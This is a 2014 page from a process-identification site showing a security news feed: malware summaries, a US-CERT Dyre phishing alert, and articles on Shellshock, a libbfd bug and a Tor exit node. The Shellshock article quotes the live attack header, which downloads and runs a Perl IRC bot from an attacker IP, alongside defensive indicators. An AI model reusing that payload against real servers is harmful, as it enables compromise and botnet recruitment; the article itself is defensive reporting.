Welcome to Process-info.org library

Process-info.org is an online library of Computer Operating System's Processes, which helps you to identify processes running at background of computer operating system or at remote computers on your network.

Process-info.org contains a growing database of executable processes (mostly with .EXE extension) and DLL libraries. You can search for processes through search box or navigate alphabeticaly by starting letter of process name.

It is assumed that users are familiar with computer operating system they're using and agree with suggested changes. Process-info.org will not be held responsible, if changes you make cause a system failure.

The Latest News

15 latest global news related to computer security

October 29, 2014 3:08:53 AM CET

Rootkit:W32/ZAccess – Rootkit:W32/ZAccess constantly displays advertisements on the infected machine and may silently contact remote servers to retrieve additional advertising information.

 

October 29, 2014 3:08:53 AM CET

Trojan-Spy:W32/FinSpy.A – Trojan-Spy:W32/FinSpy.A is a component of a commercial surveillance product that monitors user activity.

 

October 28, 2014 2:40:00 AM CET

PHISHING SCAM - 'Request to Terminate Microsoft Account' – Email purporting to be Microsoft Account Services claims that you have submitted a request to terminate your Microsoft Account and the process has already started. The email incudes a link to cancel the termination request.

 

October 27, 2014 8:35:17 PM CET

VU#121036: BMC Track-It! contains multiple vulnerabilities – BMC Track-It! version 11.3.0.355 contains multiple vulnerabilities

 

October 27, 2014 5:47:19 PM CET

Pony stealer spread vicious malware using email campaign – Most people want to stay on top of their bills, and not pay them late. But recently, unexpected emails claiming an overdue invoice have been showing up in people’s inboxes, causing anxiety and ultimately a malware attack. Read this report from the Avast Virus Lab, so as a consumer you’ll know what to look for, […]

 

October 27, 2014 5:22:00 PM CET

An Easy Way to Dramatically Improve iPhone (or Any Phone) Security – This past weekend, as I stood in line at a Whole Foods market in Portland, Maine, waiting to buy delicious Maine beer, I did something kind of sketchy. I'm not proud of it.�The woman in front of me was watching the clerk tally her purchases. As she pulled her iPhone from her pocket to check Twitter or fire off a quick text, I took a glance at the device to see what model iPhone it was -- I can't help it, I shamelessly check out other people's phones, so what?It all happened fast, and I happened to notice the four-digit code she entered to unlock it. I didn't mean to; I was just looking at the phone. (It was a gold iPhone 5s, and the passcode was 2727, if you must know.)�I wasn't even trying to see it. Imagine how easy it would be for a potential thief on the train, or standing in line at a Whole Foods -- hey, it could happen -- to watch her enter her code, grab the phone and run off to his subterranean liar or wherever people who steal phones go to wind down after a lengthy day of larceny.I probably wouldn't have written this post if Whole Foods Lady had just used Touch ID and her fingerprint to unlock her device. So, lesson one: If you have an iPhone with Touch ID, use it. It works really well, and it helps protect your passcode from prying eyes.The real point of this post: Don't use "simple" passcodes to protect your smartphone, whether it's an iPhone, Android, BlackBerry, Palm Pre, whatever. You should use an actual password and not a four-digit code. It's much more difficult to see and remember a password than a short code, especially if the password is a random set of letters and numbers. (Of course, experts suggest Really Bad Guys can use brute force attacks to crack iPhones' four-digit codes and longer password, but why make it easier on them?)�It's unrealistic to expect the average Jill iPhone to use a lengthy, random password, because they are hard to remember and even harder to type on touch screen keyboards. It's easy enough, however, to use a word that's meaningful, and memorable, to you and then throw your lucky number at the end. And if you use a fingerprint reader, you'll rarely have to enter the password anyway.�Today's smartphone owners store more and more sensitive information on their phones, and while the four-digit code is certainly better than no passcode at all, it really doesn't cut it these days. A fingerprint-based access system such as Apple's Touch ID or the Samsung Finger Scanner, secured with a password and not a passcode, is a much more suitable option for security-minded users.To disable the iPhone's "simple passcode" option and enter in a new password, tap your iPhones Settings icons, choose Touch ID and Passcode, and enter in your current passcode if you're using one. Next, turn the Simple Passcode option off, and then enter your new password, confirm it, and you're good to go.It's also a good idea to keep an eye out for sketchy weirdoes with their hands full of beer bottles, peeking at your phone while you wait in line at the supermarket to pay for organic produce.AS

 

October 27, 2014 5:10:20 PM CET

TA14-300A: Phishing Campaign Linked with “Dyre” Banking Malware – Original release date: October 27, 2014 Systems Affected Microsoft Windows Overview Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payload(s).[1][2] Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware. Description The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors.[3] Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in unpatched versions of Adobe Reader.[4][5] After successful exploitation, a user's system will download Dyre banking malware. All of the major anti-virus vendors have successfully detected this malware prior to the release of this alert.[6]Please note, the below listing of indicators does not represent all characteristics and indicators for this campaign.Phishing Email Characteristics:Subject: "Unpaid invoic" (Spelling errors in the subject line are a characteristic of this campaign)Attachment: Invoice621785.pdfSystem Level Indicators (upon successful exploitation):Copies itself under C:\Windows\[RandomName].exeCreated a Service named "Google Update Service" by setting the following registry keys:HKLM\SYSTEM\CurrentControlSet\Services\googleupdate\ImagePath: "C:\WINDOWS\pfdOSwYjERDHrdV.exe"HKLM\SYSTEM\CurrentControlSet\Services\googleupdate\DisplayName: "Google Update Service" Impact A system infected with Dyre banking malware will attempt to harvest credentials for online services, including banking services. Solution Users and administrators are recommended to take the following preventive measures to protect their computer networks from phishing campaigns:Do not follow unsolicited web links in email. Refer to the Security Tip Avoiding Social Engineering and Phishing Attacks [7] for more information on social engineering attacks.Use caution when opening email attachments. For information on safely handling email attachments, see Recognizing and Avoiding Email Scams.[8]Follow safe practices when browsing the web. See Good Security Habits [9]and Safeguarding Your Data [10] for additional details.Maintain up-to-date anti-virus software.Keep your operating system and software up-to-date with the latest patches.US-CERT collects phishing email messages and website locations so that we can help people avoid becoming victims of phishing scams.You can report phishing to us by sending email to phishing-report@us-cert.gov. References [1] MITRE Summary of CVE-2013-2729, accessed October 16, 2014 [2] MITRE Summary of CVE-2010-0188, accessed October 16, 2014 [3] New Banking Malware Dyreza, accessed October 16, 2014 [4] Adobe Security Updates Addressing CVE-2013-2729, accessed October 16, 2014 [5] Adobe Security Updates Addressing CVE-2010-0188, accessed October 16, 2014 [6] VirusTotal Analysis, accessed October 16, 2014 [7] US-CERT Security Tip (ST04-014) Avoiding Social Engineering and Phishing Attacks [8]US-CERT Recognizing and Avoiding Email Scams [9] US-CERT Security Tip (ST04-003) Good Security Habits [10] US-CERT Security Tip (ST06-008) Safeguarding Your Data Revision History October 27, 2014: Initial Release This product is provided subject to this Notification and this Privacy & Use policy.

 

October 27, 2014 4:24:00 PM CET

Vulnerability in widely used 'strings' utility could spell trouble for malware analysts – One of the first things a malware analyst does when encountering a suspicious executable file is to extract the text strings found inside it, because they can provide immediate clues about its purpose. This operation has long been considered safe, but it can actually lead to a system compromise, a security researcher found.String extraction is typically done using a Linux command-line tool called strings that's part of GNU Binutils, a collection of tools for binary file analysis and manipulation available by default in most Linux distributions.Google security engineer Michal Zalewski was recently running a type of vulnerability testing known as fuzzing against a library called libbfd (the Binary File Descriptor library) that sits at the core of GNU Binutils and is used for file format parsing. Fuzzing is the act of providing unexpected input to an application like libbfd in order to trigger potentially exploitable behavior.What Zelewski found was, in his own words, "a range of troubling and likely exploitable out-of-bounds crashes due to very limited range checking." These are the kinds of errors that can lead to arbitrary code execution."Many shell users, and certainly most of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet," Zalewski said in a blog post in which he documents one such vulnerability. "Their understanding is that the tool simply scans the file for runs of printable characters and dumps them to stdout -- something that is very unlikely to put you at any risk."According to Zalewski, that's not the case because the strings utility relies on libbfd to optimize the analysis process for supported executable formats. This means an attacker could create a binary file that exploits vulnerabilities in libbfd when analyzed by the strings utility in order to execute arbitrary code on the underlying system.The problem is made worse by the fact that many Linux distributions ship the strings utility without address space layout randomization (ASLR), a protection mechanism that makes exploiting vulnerabilities harder. This makes potential attacks "easier and more reliable -- a situation reminiscent of one of the recent bugs in bash," Zalewski said.The impact is not limited to strings. Other GNU Binutils components like objdump and readelf, or even custom tools that leverage libbfd are likely susceptible to similar attacks.Executing strings against a binary file downloaded from the Internet is not something a regular user would normally do -- at least not without being socially engineered by the attacker. However, the risk is much higher for people whose job it is to analyze hostile files every single day."The bottom line is that if you are used to running strings on random files, or depend on any libbfd-based tools for forensic purposes, you should probably change your habits," Zalewski said. "For strings specifically, invoking it with the -a parameter seems to inhibit the use of libbfd. Distro vendors may want to consider making the -a mode default, too."It's true that most malware researchers and computer forensics specialists analyze suspicious files in controlled environments, on systems specifically set up for this purpose. However, they are also known to make the occasional exception when they need a quick result, especially with such seemingly safe operations as string extraction."I'm sure many of us are guilty of running 'strings' on an untrusted file at one point or another outside of our test systems, so this does serve as a reminder that nothing is safe and vulnerabilities can be found in any code," said Carsten Eiram, the chief research officer at vulnerability intelligence firm Risk Based Security, via email.A compromise is not desirable even when it involves just a dedicated system used for analysis."A researcher wouldn't want that system to be probed from the outside," said Bogdan Botezatu, a senior e-threat analyst at antivirus vendor Bitdefender, via email. "An attacker could gain intelligence about the network topology, the tools running on the respective computer or even deny service on that machine. It's mostly intelligence harvesting rather than compromising the organization, but it's still a threat that should be taken into account."The risk posed by libbfd vulnerabilities also extends beyond the security industry."There are various tools that use libbfd, including some debug utilities that extract relevant data from crash dumps," Botezatu said. "They all depend on libbfd, whether these tools are used for forensics or debugging."Exploitation is also not limited to cases where strings is used manually. There are also automated tools that leverage libbfd-related utilities to analyze samples submitted by other internal systems or directly by users from the Internet.

 

October 27, 2014 4:03:17 PM CET

VU#577193: POODLE vulnerability in SSL 3.0 – Many modern TLS clients can fall back to version 3.0 of the SSL protocol,which is vulnerable to a padding-oracle attack when Cypher-block chaining(CBC)mode is used. This is commonly referred to as the"POODLE"(Padding Oracle On Downgraded Legacy Encryption)attack.

 

October 27, 2014 3:09:00 PM CET

Report: Criminals use Shellshock against mail servers to build botnet – Targeting message transfer agents (MTAs), and mail delivery agents (MDAs), criminals are using Shellshock as a means to create botnets. The process is slow, but working, thanks to unpatched installations of Bash or certain implementations of it.When it was disclosed in September, Shellshock -- the common name given to a vulnerability in Bash that enables command execution -- impacted systems both large and small, creating ripples across the tech industry.Vendors struggled to release and maintain patches. For several days after the initial disclosure, researchers found ways to bypass the fixes, leading to the publication of four additional CVE advisories related to the main flaw.It didn't take long, days in fact, before criminals latched on to the issue. On September 27, researchers at FireEye released details on a number of proof-of-concept scripts related to Shellshock."We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it's only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise," FireEye wrote at the time.How right they were. Among the findings from FireEye was a proof-of-concept script that created an IRC-based (Internet Relay Chat) botnet, capable of sending spam, initiating a DDoS attack, or performing remote command execution on the compromised host.On Friday, CSO became aware of a Shellshock-based campaign targeting organizations in Europe and the United States. It spreads via email, using Shellshock exploitation code in the message header fields. If successful, it delivers a simple Perl script as the payload, which adds the host to a botnet commanded form IRC.Subsequent investigation by CSO led to the discovery of one the IRC servers used to host the bots. Connected to this server was more than 160 compromised hosts as of October 24.THE MESSAGE:The Shellshock campaign targets mail servers, searching for vulnerable MTAs / MDAs. The messages themselves are blank, but the code needed to exploit the Shellshock vulnerability is placed into the message's headers.The person(s) behind the spam blasts are including the following code in several message fields, including the "To:" field, "From:" field, "Subject" field, "Date:" field, "Message ID:" and others.Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legendReferences:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legendA full list of the fields, with examples, are available here.A sample of one of the email messages - complete with headers - is available here, thanks to Benjamin Sonntag, the co-founder of citizen advocacy group La Quadrature du Net.THE SERVER:The IRC server identified by CSO is just one of several. It's installed on a previously compromised Web server that exists on the OVH network, and is maintained by a French IT firm focusing network integration and information security.While conducting research for this story, the person controlling the bots discovered us, and promptly issued a KLine, banning us from the server.Given that the IRCd (IRC Daemon) exists on the compromised host and is accessed via Telnet (port 23); it's unlikely the firm is aware of the status of their server. CSO has contacted the IT firm, their web host, and OVH to report the matter.NOTE:By the time this story went to press, none of those contacted had responded to the issue. The IRCd was off limits to us, but responded to pings. The domain serving the malicious payload was still active.There is evidence of a second server, existing on a network in Germany, which hosted more than 600 bots earlier this month. The connection between this earlier server and the recently discovered server in France is the IRCd, network naming conventions, and the fact that the same people managed both (based on login details).The following IP addresses have been linked to incidents leveraging Shellshock as an attack vector.62.193.210.216178.254.31.165190.94.251.4187.118.84.123These addresses either hosted a malicious IRC network, or were used to deliver malicious payloads. In the attack examples seen by CSO, the host was called by IP directly over HTTP (port 80) via cURL. If a domain is used to resolve the host's IP, the attackers tend to use free services, such as rima.tde.net.In addition to checking the server logs for the aforementioned IP addresses, administrators should also check to see if any unknown scripts are running on the server. The bots in this campaign are all managed by a Perl script, which will contain strings in its code that are easily found in a grep of the /tmp directory:Legend Bot [2011]Legend IRC [2010]legend.rocks@admins=("god","ARZ","Zax");"Installing Mocks please wait"THE SCRIPTThe script that powers the botnet behind this recent campaign is called Legend, and it has existed for several years now. The Legend script is simplistic, but effective once installed on a system. It isn't designed to be clandestine, so it's often discovered during a scan of running processes, TMP directories, or network traffic.With Legend, a compromised host can be called upon to do a number of things, including open a reverse shell, send spam, initiate a DDoS attack, scan a network with NMAP, or conduct basic Denial of Service via HTTP, TCP, UDP, or SQL. The script can also reveal sensitive information about the host, or turn it into a proxy.Once installed, Legend will connect the compromised host to a pre-configured IRC server, where the attacker can issue commands individually or as a group. CSO has seen evidence of two Legend scripts circulating online. The source code for the first script, seen in late September and early October, is available here. The second, more recent script can be viewed here.It's also worth noting that in separate, but related attacks, a second botnet script has been identified. The script, called "JST Perl IrcBot" in the headers, has many of the same functions as Legend. It was a suggested as a possible payload when someone on Reddit identified the same campaign that CSO was investigating.Mitigation:The following MTAs / MDAs are directly impacted by Shellshock in some cases, depending on their configuration. The source link will open links to additional sources of information.Courier Mail Server [Source]Exim [Source]QMail [Source] [Source]Postfix [Source] / Procmail [Source]There is at least one Shellshock exploit for Postfix circulating online, triggering the same attack as observed in this article The Procmail source link points to an additional possible attack vector.Sendmail [Source]Depending on how it is configured, Sendmail is vulnerable. This is especially true for web scripts that call Sendmail. One example of such a script is sendmail-wrapper, which logs and throttles email sent by PHP. It was patched against Shellshock shortly after it was disclosed.Above all else, the most important mitigation step is patching Bash to ensure that systems are updated with the latest version. All major vendors and Linux distributions have released patches against Shellshock, including Red Hat, IBM, Juniper, Cisco, Debian, Ubuntu, VMware, McAfee, and HP.

 

October 27, 2014 3:01:00 PM CET

Planning for a security emergency from the Tabletop down – Tabletop exercises enable organizations to analyze potential emergency situations in an informal environment, and are designed to foster constructive discussions among participants as they examine existing operational plans and determine where they can make improvements.Such exercises seem like a natural for information and physical security, because they provide a forum for planning, preparation and coordination of resources during any kind of attack.[ Address security with the board: Tips for both sides of the table ]"Tabletop testing generally takes the form of a discussion-based exercise, and involves reviewing roles, responsibilities and response efforts required to respond to a given security incident," says Jay McLaughlin, CSO and senior vice president at Q2, a provider of software for the financial services industry."Testing tends to provide a high-level estimate of the potential for success in the event of such an incident," McLaughlin says. "The major benefit of using these types of exercises is that they provide real scenarios in a non-threatening, non-disruptive format--and can be rather economical to conduct. The goal [is] that participants and management become more aware of possible gaps or weaknesses that may exist in the incident response plan."But what are the best practices for using security tabletop exercises? We asked some security executives to weigh in on the topic and here are a few of their suggestions.Take the time to prepare for the exercise. "Preparation is a critical key to success in these exercises," McLaughlin says. "During the planning phase, the objectives, scope, and participants must be determined."This is often the most time--consuming phase of planning for the exercise itself, but will ensure that the exercise is valuable, McLaughlin says. "When conducting the exercise, it is important that the facilitator enforces boundaries and helps guide the conversation, to prevent the group from going down the proverbial rabbit hole, which can often derail the exercise," he says.Conversations should be focused on the efforts required for detection, containment, eradication and recovery from an incident, McLaughlin says. Following the exercise, a post-incident summary of the activities should be documented and reviewed, he says. This review should capture lessons learned, as well as what could be done to improve the overall response efforts of future incidents. Involve multiple parties from throughout the organization.Develop a list of business function leaders from across different areas of the company that will be part of the table exercises team in addition to those from security."A tabletop exercise allows you to not only test your incident response capability, but it gives you the opportunity to coordinate across various teams including human resources, communications, legal, compliance, IT, physical security, etc.," says Mary Chaney, senior team leader, Incident Response & Data Management, at GE Capital Americas, a financial services unit of General Electronic Co."The problem that we as security professionals face is the lack of visibility until something bad happens," Chaney says. "A tabletop exercise gives you the ability reach out in a non stressful environment to ensure the relevant parties are engaged timely and appropriately. Most importantly, [other] business leaders actually know your name and that you are there to help."Involving business leaders in tabletop exercises "also gives senior leadership comfort in knowing that we are doing something to test our response and communications capability," Chaney says. It's a good idea to draft a report of the findings "and share it with all relevant stakeholders," she says. "Seek assistance with addressing gaps in the process and take the time to solidify who actually has decision making ability, before the crisis happens."Having others from outside security sitting in on a drill can provide "a level of awareness as to why [information security] imposes controls that prior to the drill may have been viewed as excessive," says Mark Olson, director of information security at Iron Mountain, a provider of storage and information management services."By running a drill that follows an attack from drive by to a simple compromise of a desktop followed by a sideways attack on a server, [security] starts to make sense," Olson says. "Suddenly, the [information security] approach and program philosophy are no longer a 'sky is falling' theory but has a tangible risk reduction purpose. The tabletop exercise is the opportunity to demonstrate the purpose and value of our InfoSec program."Make sure the participants know the ground rules of the exercise. "Communicate what is in scope for the exercise and out of scope," says Elayne Starkey, CSO for the State of Delaware."Participants get frustrated if the ground rules aren't explained or provided to them before the exercise," Starkey says. "Frustration can lead to those individuals having a negative experience during the exercise, and could result in them not getting a lot of value from the exercise."Participants could then decide that exercises are a "waste of time" and not volunteer to participate in others, Starkey says. "In our exercises, each participant receives a copy of the official ground rules," she says.Ensure that the participants know how to communicate during the exercise. "For example, are they to simulate communications or should they actually communicate their decisions to other individuals that are participating?" Starkey says.Leverage resources from within your industry and the government. Some industry organizations provide services to help companies conduct tabletop exercises.For example, the Financial Services--Information Sharing and Analysis Center (FS-ISAC) is a financial services industry forum for collaboration on critical security threats facing the global financial services sector.GE Capital Americas belongs to FS-ISAC, Chaney says. "They have several different types of tabletop exercises that are facilitated by them, which cover various types of scenarios," she says. "The exercises are designed to test internal and external response capabilities."In a recent exercise with FS-ISAC, GE Capital tested communications inside its environment and determined at what point an event rises to the level where the company should communicate with other FS-ISAC members.It's also a good idea to invite outside agencies from federal, state and local government to participate.( There are two reasons to do this, says Robert Connors, director of preparedness,(Wounded Warrior Project Partnership at Raytheon Co., a provider of electronics, defense, communications and other systems."First, to get to know them and for them to get to know your environment before a crisis occurs," Connors says. "Second, so they can learn from you and share best practices with you. It's a mutually beneficial partnership."When exercising, broader can be better.When structuring a tabletop it's important to scope the breadth of the exercise, Olson says. "When running a drill from detection through customer and public disclosure, a wealth of knowledge of your program is presented," Olson says."In the InfoSec world we typically view drills as the opportunity to validate our processes and procedures," Olson says. "In a drill that runs through to handling the public disclosure you gain much more. It provides a view into the organization's understanding of information security. It gives insight into how effective your security awareness training program is."Make the scenario as realistic as possible.  "People tend to try to 'fight' the scenario," Starkey says. "If it is a realistic scenario or event that is simulated, the fighting doesn't occur. Invite subject matter experts to the planning team to accomplish this."For example, a recent exercise in Delaware was a cyber attack on the power grid, "and we included a rep from our largest utility to help write the exercise injects," Starkey says.

 

October 27, 2014 8:29:46 AM CET

Fighting Cybercrime Across Borders: Why Law Enforcement Collaboration Matters – We’ve frequently talked about how important it is for law enforcement and security companies to work together to stop cybercrime. One particular reason to do so is because of the nature of cybercrime: simply put, it has no borders. Perhaps more than any other type of crime, cybercrime respects no borders. A cybercriminal in Russia […]Post from: Trendlabs Security Intelligence Blog - by Trend MicroFighting Cybercrime Across Borders: Why Law Enforcement Collaboration Matters

 

October 27, 2014 2:54:00 AM CET

Tor Project flags Russian 'exit node' server for delivering malware – The Tor Project has flagged a server in Russia after a security researcher found it slipped in malware when users were downloading files.Tor is short for The Onion Router, which is software that offers users a greater degree of privacy when browsing the Internet by routing traffic through a network of worldwide servers. The system is widely used by people who want to conceal their real IP address and mask their web browsing.The suspicious server was an "exit node" for Tor, which is the last server in the winding chain used to direct web browsing traffic to its destination.Roger Dingledine, Tor Project's project leader and director, wrote the Russian server has been labeled a bad exit node, which should mean Tor clients will avoid using the server.The Russian server was found by Josh Pitts, who does penetration testing and security assessments with Leviathan Security Group. He wrote he wanted to find out how common it was to find attackers modifying the binaries of legitimate code in order to deliver malware.Binaries from large software companies have digital signatures that can be verified to make sure the code hasn't been modified. But Pitts wrote most code isn't signed, and even further, most don't employ TLS (Transport Layer Security) during downloading. TLS is the successor to SSL (Secure Sockets Layer), which encrypts connections between a client and a server.He suspected attackers were "patching" binaries during man-in-the-middle attacks and took a look at more than 1,110 Tor exit nodes.Pitts only found one Tor exit node that was patching binaries. The node would modify only uncompressed portable executables, he wrote."This does not mean that other nodes on the Tor network are not patching binaries; I may not have caught them, or they may be waiting to patch only a small set of binaries," he wrote.The broad lesson for users is that they should be wary of downloading code that is not protected by SSL/TLS, even if the binary itself is digitally signed, Pitts wrote."All people, but especially those in countries hostile to 'Internet freedom,' as well as those using Tor anywhere, should be wary of downloading binaries hosted in the clear -- and all users should have a way of checking hashes and signatures out of band prior to executing the binary," he wrote.Send news tips and comments to jeremy_kirk@idg.com. Follow me on Twitter: @jeremy_kirk

 

October 27, 2014 2:50:00 AM CET

HOAX - 'NASA Confirms 6 Days of Total Darkness' – A circulating report claims that NASA has confirmed that Earth will experience 6 days of total darkness between the 16th and the 22nd of December due to a solar storm.

 

October 27, 2014 2:09:00 AM CET

Skype 'Missed Messages' Pharmacy Spam – According to this email, which claims to be from Skype, you have missed messages waiting. The email invites you to click a link to view your messages.

 
 
 

Navigate through library of processes alphabeticaly by first letter: